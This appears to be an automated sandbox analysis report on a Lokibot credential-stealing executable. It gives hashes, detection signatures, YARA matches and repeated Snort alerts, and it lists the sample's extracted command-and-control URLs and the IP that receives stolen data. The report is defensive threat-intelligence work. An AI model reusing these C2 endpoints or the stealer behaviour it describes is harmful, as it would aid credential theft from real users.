Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report FJbeidnZOF.exe

Overview

General Information

Sample Name:FJbeidnZOF.exe
Analysis ID:399798
MD5:0b43c829af2eb773a3614b02ba5b8c5f
SHA1:bc55a69ca1a72f9f0761112c05b3938aebad1c43
SHA256:25b6f68e2bf505cfde67c533f5d12e869b30efe831fa82fd91c2c29f59fc77ac
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Found C&C like URL pattern
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • FJbeidnZOF.exe (PID: 5392 cmdline: 'C:\Users\user\Desktop\FJbeidnZOF.exe' MD5: 0B43C829AF2EB773A3614B02BA5B8C5F)
    • FJbeidnZOF.exe (PID: 5472 cmdline: C:\Users\user\Desktop\FJbeidnZOF.exe MD5: 0B43C829AF2EB773A3614B02BA5B8C5F)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://amrp.tw/kayo/gate.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x2007af:$des3: 68 03 66 00 00
        • 0x204ba0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x204c6c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.FJbeidnZOF.exe.2592e78.1.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x28ecc:$s1: http://
          • 0x2c687:$s1: http://
          • 0x2d0e0:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x28ed4:$s2: https://
          • 0x28ecc:$f1: http://
          • 0x2c687:$f1: http://
          • 0x28ed4:$f2: https://
          1.2.FJbeidnZOF.exe.2592e78.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.FJbeidnZOF.exe.2592e78.1.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              1.2.FJbeidnZOF.exe.2592e78.1.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                1.2.FJbeidnZOF.exe.2592e78.1.raw.unpackLoki_1Loki Payloadkevoreilly
                • 0x28e08:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x29050:$a2: last_compatible_version
                Click to see the 21 entries

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://amrp.tw/kayo/gate.phpAvira URL Cloud: Label: malware
                Found malware configurationShow sources
                Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://amrp.tw/kayo/gate.php"]}
                Multi AV Scanner detection for domain / URLShow sources
                Source: amrp.twVirustotal: Detection: 19%Perma Link
                Source: http://amrp.tw/kayo/gate.phpVirustotal: Detection: 20%Perma Link
                Multi AV Scanner detection for submitted fileShow sources
                Source: FJbeidnZOF.exeVirustotal: Detection: 22%Perma Link
                Source: FJbeidnZOF.exeReversingLabs: Detection: 27%
                Machine Learning detection for sampleShow sources
                Source: FJbeidnZOF.exeJoe Sandbox ML: detected
                Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: FJbeidnZOF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: FJbeidnZOF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,5_2_00403D74

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49761 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49762 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49763 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49764 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 35.247.234.230:80
